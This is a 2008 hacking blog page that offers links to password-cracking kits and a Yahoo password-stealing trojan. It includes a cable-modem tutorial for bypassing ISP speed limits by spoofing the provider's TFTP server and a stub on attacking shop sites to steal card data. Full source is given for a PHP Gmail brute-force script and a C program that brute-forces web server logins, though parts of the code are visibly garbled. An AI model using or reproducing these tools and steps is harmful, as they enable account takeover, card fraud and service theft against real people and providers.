Tuesday, February 26, 2008

This AIO contains the tools necessary to gain access to password protect websites. These tools allow you to get proxies, create wordlists, and brutefo

This AIO contains the tools necessary to gain access to password protect websites. These tools allow you to get proxies, create wordlists, and bruteforce attack! Also included is a very in depth tutorial on how to effectively use all of the programs together.


http://rapidshare.com/files/80587447/Password_Bruteforcing_AIO.rar.html

***password is www.crazy-coderz.net***

Brutus AE2, Brutus AE2 is a forcer tool. Iit cracks passwords online or remotely

http://rapidshare.com/files/46616923/Brutus_AE2.rar

Hack Your Modem and Increase Your Download Speed from 64Kbps to any Speed You Wish

Hack Your Modem and Increase Your Download Speed from 64Kbps to any Speed You Wish



Most of us will be feeling that the surfing speed which is allocated by our ISP is not enough. People with 64Kbps will think 128Kbps will be cool speed. People with 128Kbps will think 256Kbps will be cool and so on

This tutorial will teach you how to increase your 64Kbps link to 512Kbps or what ever speed you like.

It is very much possible to do this. With a bit of luck if your Cable Internet Service Provider are very uneducated on how this very new technology works and leave some key loopholes open for you to grab vital information on how to accomplish this task. But this tutorial will no guarantee you 100% success.

Okay here we go. I'm going to try to explain you as best as I can to accomplish re-configuring your SB5100, SB4100 or SB3100 cable modem

Theory of cable modem working

All the cable modems when it boots up it will search for an "Image file" where in all configuration like your upload speed limit and download speed limit is defined. This "Image file" is stored in ISP`s TFTP server. Modem will be pre-configured with the ISP`s TFTP server IP address and the Image file name to be downloaded. When the modem boots up it query TFTP server and download Image file from TFTP server according to this this our speed limits will be set.

Our Mission

Get this Image file from ISP`s TFTP server, reconfigure it according to our need and force our modem to download this file from our Computer rather than downloading it from our ISP`s TFTP server.

Steps to accomplish

1). Get cable modems MAC address
2). Get your ISPs TFTP server IP address
3). Get name and path of the "configuration file" or Image file stored in the ISP`s TFTP server.
4). Download Image file from ISP`s TFTP server.
5). Decrypt the Image file which you downloaded from ISP`s TFTP server
6). Modify the Image file
7). Encrypt the modified Image file
8). Change your computer's TCP configuration same as ISP`s TFTP server (i.e. IP address same as ISP`s TFTP server)
9). Host TFTP server in your computer
10). Put Image file in the base directory of your TFTP
11). Restart your modem
12). Changer your PC's IP back as given by ISP
13). OOPS Done. Start surfing with your new speed


1). Get cable modems MAC address

You can either look at the back of the modem to get this MAC Address or you can logon to your Cable modem with your Web Browser hxxp://192.168.100.1/ . This is internal HTML pages stored within your DOCsis cable modem (SB5100, SB4100 and SB3100) that gives you even more vital information on configuration. Unless it is turned off by your ISP. This feature might be totally turned off by your ISP.

2). Get your ISPs TFTP server IP address
3). Get name and path of the "configuration file" or Image file stored in the ISP`s TFTP server.

For getting this vital information you have to do an SNMP walk over your modem. For doing this you can use any one of the tools below

a) There's a program called QUERY.EXE from Weird Solutions which is a BOOTP packet request program that will tell you everything you need to know, without all these extra steps. It will display the Image Filename, TFTP server address, which is really all you need to get started. To use this BOOTP QUERY tool, you need the MAC address of your cable modem

Or

Experts can use Solarwinds SNMP program

Or

c) Beginners can use DOCSIS Diagnosis utility

Or

d) Beginners can use SNMPWALK Tool

use command "snmpwalk 192.168.100.1 public"

NOTE: Use modem's IP address as "192.168.100.1" (SB5100, SB4100 and SB3100) when it asked to provide by any of the above tools. SNMP community is "Public"

Using the above tools you will get the information of your ISP`s TFTP server IP and the name of your "Image file" stored in that TFTP server
All your vital information is stored in this file, One of which is the MaxRateDown 2621440; MaxRateUp 393216;. (This was my ISP settings. Which you can see is similar to what speed I was getting. 40KB/s up and 250 KB/s down)

Among these, the one we need are:
Configuration TFTP Server = 194.*.*..90 (replace this with yours throughout in the doc)
Configuration filename = isrr.bin (replace this with yours throughout in the doc)
And
IP fragments created = 0
IP address.10.xxx.xxx.xxx = 10.xxx.xxx.xxx
IP address.192.168.100.1 = 192.168.100.1 (the IP address of the cable modem, (replace this with yours throughout in the doc)
IP-to-If-index.10.xxx.xxx.xxx = 2

Suggestion: You can do this step by sniffing the modem i.e. "192.168.100.1" when modem boots up. I never tried this method. Try your luck.


4). Download Image file from ISP`s TFTP server.

For doing this got to your command prompt and use below commands with out quotes and bracket.


"C:\tftp -i GET "

Okay now you got Image file from your ISP`s TFTP server.


5). Decrypt the Image file which you downloaded from ISP`s TFTP server
6). Modify the Image file
7). Encrypt the modified Image file

Use docsis tool which you can download from
CODEhttp://sourceforge.net/projects/docsis

using this program you can decrypt image file change the upload speed and download speed ,save it and encrypt back. Rename this newly created file same as your original image file.


8). Change your computer's TCP configuration same as ISP`s TFTP server (i.e. IP address same as ISP`s TFTP server)

Go to my network place and right click ->properties
Select your LAN Card right click ->property->Internet Protocol (TCP-IP) double click on it and change it to as following values
Configure your TPC's TCP settings as below
IP: 194.*.*.90 (replace with the ISP's TFTP server)
Netmask: 255.255.255.0
Gateway: 192.168.100.1 (replace with your cable modem's IP address)

Note: Gateway should be 192.168.100.1 then only your modem can communicate with computer.


9). Host TFTP server in your computer
10). Put Image file in the base directory of your TFTP
11). Restart your modem

Download TFTP Server software and host TFTP server in your computer
You can download TFTP server from:
CODEftp://ftp.ida.net/pub/wireless/tftpd32.exe

Start TFTPD32 server. Go to Settings and set the Security to None. Increase the timeout to 20secs and the Max Retransmit to 6. Choose to translate UNIX filenames. Make sure it's base directory point to where the isrr.bin is (i.e. the image file which you modified). If you need to replicate a directory pathname along with the image file, then make a directory from root that corresponds to the image file pathname.

Restart your modem, and AS SOON as the SEND light goes solid, you should see a receive on your TFTP server i.e. your PC


12). Changer your PC's IP back as given by ISP
13). OOPS Done. Start surfing with your new speed

Now you change your TCP settings of your PC back to normal as given by ISP. (I.e. Put your original IP address and gateway)

Oops you hacked your modem. Test out by downloading some files using DAP (Download accelerator plus)

Note: This speed will remain same until you restart your cable modem. So each time you reboot your modem you have to follow the steps 8,9,10,11 and 12


Have Fun

This is a Tutorial to hack .cfm? and .asp Shops.

This is a Tutorial to hack .cfm? and .asp Shops.
You should look up some sql commands if u encounter an error it really helps!
SQL for server Error:
Error Diagnostic Information
ODBC Error Code = 37000 (Syntax error or access violation)
[Microsoft][ODBC SQL Server Driver][SQL Server]Line 1: Incorrect syntax near ".

Thanks For Repling

CODE
http://rapidshare.com/files/93306375/042187203199.rar.html


Use the tool(s):
CODE
http://icswc.yurx.com/good/
http://toolhackvn.net/tool/
http://www.darktoolz.org/hacktool/

etc..
etc...

Enjoy hacking those cvv2's!!




for education purpose

# This script was created to Brute Force G-Mail Logins,#

# This script was created to Brute Force G-Mail Logins,#
#it Uses CURL and 2 Methods of Login attacks (Brute Force and Dictionary) #
////////////////////////

$dic ="your Dictionary file here.txt";

///////////////////////



echo "
Gmail Brute Force Attacker








Gmail Brute Force Attacker





















 




Username to brute:




-





 


";

// Sets variables and retrives google error for comparing
if(isset($_POST['attack']) && isset($_POST['username'])) {
$username = $_POST['username'];
$headers = array(
"Host: mail.google.com",
"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4",
"Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5",
"Accept-Language: en-us,en;q=0.5",
"Accept-Encoding: text", # No gzip, it only clutters your code!
"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7",
"Date: ".date(DATE_RFC822)
);
$c = curl_init('https://mail.google.com/mail/feed/atom');
curl_setopt($c, CURLOPT_HTTPAUTH, CURLAUTH_ANY); // use authentication
curl_setopt($c, CURLOPT_HTTPHEADER, $headers); // send the headers
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); // We need to fetch something from a string, so no direct output!
curl_setopt($c, CURLOPT_FOLLOWLOCATION, 1); // we get redirected, so follow
curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 1);
curl_setopt($c, CURLOPT_UNRESTRICTED_AUTH, 1); // always stay authorised
$wrong = curl_exec($c); // Get it
curl_close($c); // Close the curl stream
}

//Dictionary Attack
if($_POST['attack'] == "dictionary") {
$Dictionary = file("$dic");
for ($Position = 0; $Position < count($Dictionary); $Position++) {
$Dictionary[$Position] = str_replace("\r\n", "", $Dictionary[$Position]);
if(check_correct($username, $Dictionary[$Position])) {
die("




Found the password of: ".$Dictionary[$Position]."
For the account: ".$username."



");
}
}
echo "




Sorry... a password was not found for the account of ".$username." during the dictionary attack.

";
}

//Brute Attack
elseif($_POST['attack'] == "brute") {
for ($Pass = 0; $Pass < 2; $Pass++) {
if ($Pass == 0){$Pass = "a";} elseif ($Pass == 1){ $Pass = "a"; }
if(check_correct($username, $Pass)) {
die("




Found the password of: ".$Dictionary[$Position]."
For the account: ".$username."



");
}
}
echo "




Sorry... a password was not found for the account of ".$username." during the brute force attack.

";
}
echo "
";

// Function for checking whether the username and password are correct
function check_correct($username, $password)
{
global $wrong, $headers;
$c = curl_init('https://'.$username.':'.$password.'@mail.google.com/mail/feed/atom');
curl_setopt($c, CURLOPT_HTTPAUTH, CURLAUTH_ANY); // use authentication
curl_setopt($c, CURLOPT_HTTPHEADER, $headers); // send the headers
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); // We need to fetch something from a string, so no direct output!
curl_setopt($c, CURLOPT_FOLLOWLOCATION, 1); // we get redirected, so follow
curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 1);
curl_setopt($c, CURLOPT_UNRESTRICTED_AUTH, 1); // always stay authorised
$str = curl_exec($c); // Get it
curl_close($c);
if($str != $wrong) {return true;}
else {return false;}
}


?>

Enjoy

Hers's the Software for Yahoo hacking...

Hers's the Software for Yahoo hacking...
But remember you all guys would be using at your own risk....
Actually its a trojan...and not the software......

MAGIC PS 1.5 se

which sends password to your yahoo id....

http://rapidshare.com/files/11053374/PASS-hak.rar

Above is the download link................

Before starting this software.....do not forget to ask me that how it works....
becoz it can finish your pc as well............

Brute Force into a Web Server. * * *

Brute Force into a Web Server. * * *
/ *
* Brute Force your way into a Web Server.
* -Works best on computers in the same subnet :-)
* In order to use this:
* 1) Get a dictionary file.
* 2) Compile this program, and run it. The arguments are-
* username dictfile hostname port
* << most websites have 'admin' as a user >>
* 3) Wait for user name and password to appear.
* NOTE: If you want to see the webserver's response,
* define VERBOSE when compiling.
* WARNING: If the webserver logs, it will
* be obvious that you are attacking!
* DISCLAIMER: Please use this program in a
* responsible manner.
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

extern int errno;
/* Change this to whatever document you want to get off the web server */
#define DEFAULT_DOCUMENT "/"

char alphabet[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
"0123456789+/";

unsigned char buf_64[512];
unsigned short socket_timeout=20;
char line[2048];

enum TOKENTYPE { NONE, BLANKS, PUNCT, TAG, NAME, CONTENT };

struct TOKEN {
char *text;
int length;
int index;
enum TOKENTYPE type;
};

struct BASE64_PARAMS {
unsigned long int accum;
int shift;
int save_shift;
};

int read_dict_file ( char *buff, FILE *f )
{
int b, i;
*buff = 0;
do {
while ((b = fgetc(f)) != EOF && (b == ' ' || b == '\t' || b == '\n' || b == '\r'));
if ( b == EOF ) return(0);
for ( i = 0; b != EOF && b != '\n' && b != '\r'; i++ )
{
buff = (b == '\t') ? ' ': b;
b = fgetc(f);
}
buff = 0;
}
while (*buff == '#');

return(1);
}

void (*
r_signal(sig, func, fd_socket, fd_accept)) (int)
int sig;
void (*func) ();
int fd_socket;
int fd_accept;
{
struct sigaction act, oact;

act.sa_handler = func;

sigemptyset(&act.sa_mask);
act.sa_flags = 0;
#ifdef SA_RESTART
act.sa_flags |= SA_RESTART;
#endif

if (sigaction(sig, &act, &oact) < 0)
return (SIG_ERR);

return (oact.sa_handler);
}
/* Read 'n' bytes from a descriptor */
int readn(fd, ptr, nbytes)
register int fd;
register char *ptr;
register int nbytes;
{
int nleft, nread;

nleft=nbytes;
while(nleft > 0) {
nread=read(fd,ptr,nleft);
if (nread<0)
return(nread);
else if (nread==0)
break;

nleft -=nread;
ptr +=nread;
}
return(nbytes-nleft);
}

/* Write 'n' bytes to a descriptor */
int writen(fd, ptr, nbytes)
register int fd;
register char *ptr;
register int nbytes;
{
int nleft, nwritten;

nleft=nbytes;
while(nleft > 0) {
nwritten=write(fd, ptr, nleft);
if(nwritten <= 0)
return(nwritten);

nleft -= nwritten;
ptr += nwritten;
}
return(nbytes-nleft);
}

char * dateTime()
{
time_t t;
char * s;

time(&t);
s = (char *)ctime((const time_t *)&t);
s[24] = '\0';
return s;
}
void handle_SIGSEGV (void)
{
fprintf(stderr, "\nSegmentation Violation! [%s]\n", dateTime());
exit(1);
}

void handle_SIGINT (void)
{
fprintf(stderr, "\nSignal Interrupt! [%s]\n", dateTime());
exit(1);
}


void sendln(int s, char buf[1024]) {
writen(s, buf, strlen(buf), 0);
}

int readln(int s)
{
int i,done=0,w, result;
char tmp[1];
struct timeval timeout;
fd_set inputs;

sprintf(line,"");
i = 0;

while (!done) {
FD_ZERO(&inputs);
FD_SET(s, &inputs);
timeout.tv_sec = socket_timeout;
timeout.tv_usec = 0;

result = select(FD_SETSIZE, &inputs,(fd_set *)0, (fd_set *)0,
&timeout);
switch(result) {
case 0:
printf("\n\nSocket Timeout\n");
exit(1);
break;
case -1:
perror("select");
exit(1);
break;
default:
w=readn(s ,tmp, 1);
break;
}
if (w==0) return 0;
if (tmp[0] != 0) {
line = tmp[0];
}
if (line == '\n') {
done = 1;
}
i++;
}
line = 0;
return (i);
}
/* Code to call out on a socket */
int call_socket(hostname, portnum)
char *hostname;
u_short portnum;
{
struct sockaddr_in sa;
struct hostent *hp;
int a, s, foo=1;

if ((hp= gethostbyname(hostname)) == NULL) { /* do we know the host's */
errno= ECONNREFUSED; /* address? */
return(-1); /* no */
}

bzero(&sa,sizeof(sa));
bcopy(hp->h_addr,(char *)&sa.sin_addr,hp->h_length); /* set address */
sa.sin_family= hp->h_addrtype;
sa.sin_port= htons((u_short)portnum);

if ((s= socket(hp->h_addrtype,SOCK_STREAM,0)) < 0) /* get socket */
return(-1);

#ifdef SOCKET_OPTS
/* set socket options so we can try multiple connects */
if (setsockopt(s, SOL_SOCKET, SO_REUSEADDR, (char *)&foo, sizeof(foo)) ==-1) {
fprintf(stderr, "Error setting SO_REUSEADDR socket option in call_socket!\n");
fflush((FILE *)stderr);
exit(1);
}
#endif

if (connect(s,(struct sockaddr *)&sa,sizeof sa) < 0) { /* connect */
perror("connect failed");
exit(1);
}

return(s);
}

int base64_encode( int quit, struct BASE64_PARAMS *e_p,
char *string_to_encode )
{
int index;
unsigned long int value;
unsigned char blivit;
int z=0;

index = 0;
while ( ( *(string_to_encode+z) ) || (e_p->shift != 0) )
{
if ( ( *(string_to_encode+z) ) && ( quit == 0 ) )
{
blivit = *(string_to_encode +z);
z++;

if ( *(string_to_encode+z)==0 )
{
quit = 1;
e_p->save_shift = e_p->shift;
blivit = 0;
}
}
else
{
quit = 1;
e_p->save_shift = e_p->shift;
blivit = 0;
}
if ( (quit == 0) || (e_p->shift != 0) )
{
value = (unsigned long)blivit;
e_p->accum <<= 8;
e_p->shift += 8;
e_p->accum |= value;
} /* ENDIF */

while ( e_p->shift >= 6 )
{
e_p->shift -= 6;
value = (e_p->accum >> e_p->shift) & 0x3Fl;
blivit = alphabet[value];

buf_64[index++] = blivit;
if ( index >= 60 )
{
buf_64[index] = '\0';
/* printf( "%s\n", buf_64 ); */
index = 0;
}

if ( quit != 0 )
{
e_p->shift = 0;
}
}
}

if ( e_p->save_shift == 2 )
{
buf_64[index++] = '=';
if ( index >= 60 )
{
buf_64[index] = '\0';
/* printf( "%s\n", buf_64 ); */
index = 0;
}

buf_64[index++] = '=';
if ( index >= 60 )
{
buf_64[index] = '\0';
/* printf( "%s\n", buf_64 ); */
index = 0;
}
}
else if ( e_p->save_shift == 4 )
{
buf_64[index++] = '=';
if ( index >= 60 )
{
buf_64[index] = '\0';
/* printf( "%s\n", buf_64 ); */
index = 0;
}
}
if ( index != 0 )
{
/* buf_64[index-1]='='; */
buf_64[index] = '\0';
/* printf( "%s\n", buf_64 ); */
}

return quit;
}

void encode_string (char *namepass)
{
struct BASE64_PARAMS e_p;
int quit=0;
register int i;
char * some;

e_p.shift = 0;
e_p.accum = 0;

some=(char *)malloc(256);

/* Nasty hack (forgive the lame coding...) */
some = (char *)namepass;
for (i=0;*(some+i);i++);
*(some+i)=*(some+i-1);
*(some+i+1)='\0';

base64_encode(quit, &e_p, (char *)some);
}


void sorry (void)
{
printf("\nSorry, but I could not get in.\n");
printf("There are two reasons why:\n");
printf("1) The user (argv[1]) does not exist on the webserver.\n");
printf("2) The user exists, but his/her passwd was not in your dict_file.\n");
printf("Have a Nice Day. :-)\n\n");
exit(0);
}

void usage(char *prog_name)
{
printf("\nUsage: ");
printf("[%s] username dictfile hostname port\n", prog_name);
printf("\n");
exit(0);
}

int main ( argc, argv )
unsigned int argc;
char **argv;
{

FILE * dict_fd=NULL;
struct hostent *hp;
unsigned short web_port=0;
int sock_fd=0;
char * dict_word=NULL;
char export_buff[1024];
char * encoded_buffer=NULL;
unsigned short finish_flag=1, success=0;
int foo;
if ( argc !=5 )
usage(argv[0]);

r_signal(SIGSEGV, handle_SIGSEGV);
r_signal(SIGINT, handle_SIGINT);

dict_word= (char *)malloc (256);

if ((dict_fd=fopen(argv[2], "r"))==NULL ) {
fprintf(stderr, "\nCould not open dictionary file: [%s]\n%s\n\n",
argv[2], strerror(errno));
exit(1);
}

if ((hp=(struct hostent *)gethostbyname((char *)argv[3])) == NULL) {
fprintf(stderr, "\nCould not resolve hostname: [%s]\n\n", argv[3]);
exit(1);
}

web_port = atoi(argv[4]);

encoded_buffer=(char *)malloc(512);

while (read_dict_file(dict_word, dict_fd)) {
if ((sock_fd=call_socket(argv[3], web_port))==-1) {
perror("socket connection");
exit(1);
}

#ifndef SOLARIS
if ((foo=ioctl(sock_fd, FIONBIO , 1))==-1) {
perror("ioctl");
exit(1);
}
#else
if ((foo=fcntl(sock_fd, O_NDELAY, 1)) <0) {
perror("ioctl");
exit(1);
}

#endif
sprintf(export_buff, "GET / HTTP/1.0\n");
sendln(sock_fd, export_buff);

sprintf(encoded_buffer, "%s:%s", argv[1], dict_word);
encode_string(encoded_buffer);
sprintf(export_buff, "Authorization: Basic %s\n\n", buf_64);
sendln(sock_fd, export_buff);

memset(line, '\0', sizeof(line));
while( readln(sock_fd)) {

#ifdef VERBOSE
printf("%s", line);
fflush((FILE *)stdout);
#endif

/* Change this to a more sophisticated test. */
/* This test is pretty lame, but works for */
/* all practical purposes. */
if (strstr(line, "nauthorized"))
finish_flag=0;
}

if (finish_flag) {
close(sock_fd);
finish_flag=1;
success=1;
break;
}

finish_flag=1;
close(sock_fd);

}

fclose(dict_fd);
if (!success)
sorry();
else {
printf("\n\nThe UserName is: %s\n", argv[1]);
printf("The Password is: %s\n", dict_word);
printf("\n\n\n ---- Coded by BeastMaster V ----\n");
exit(0);
}

}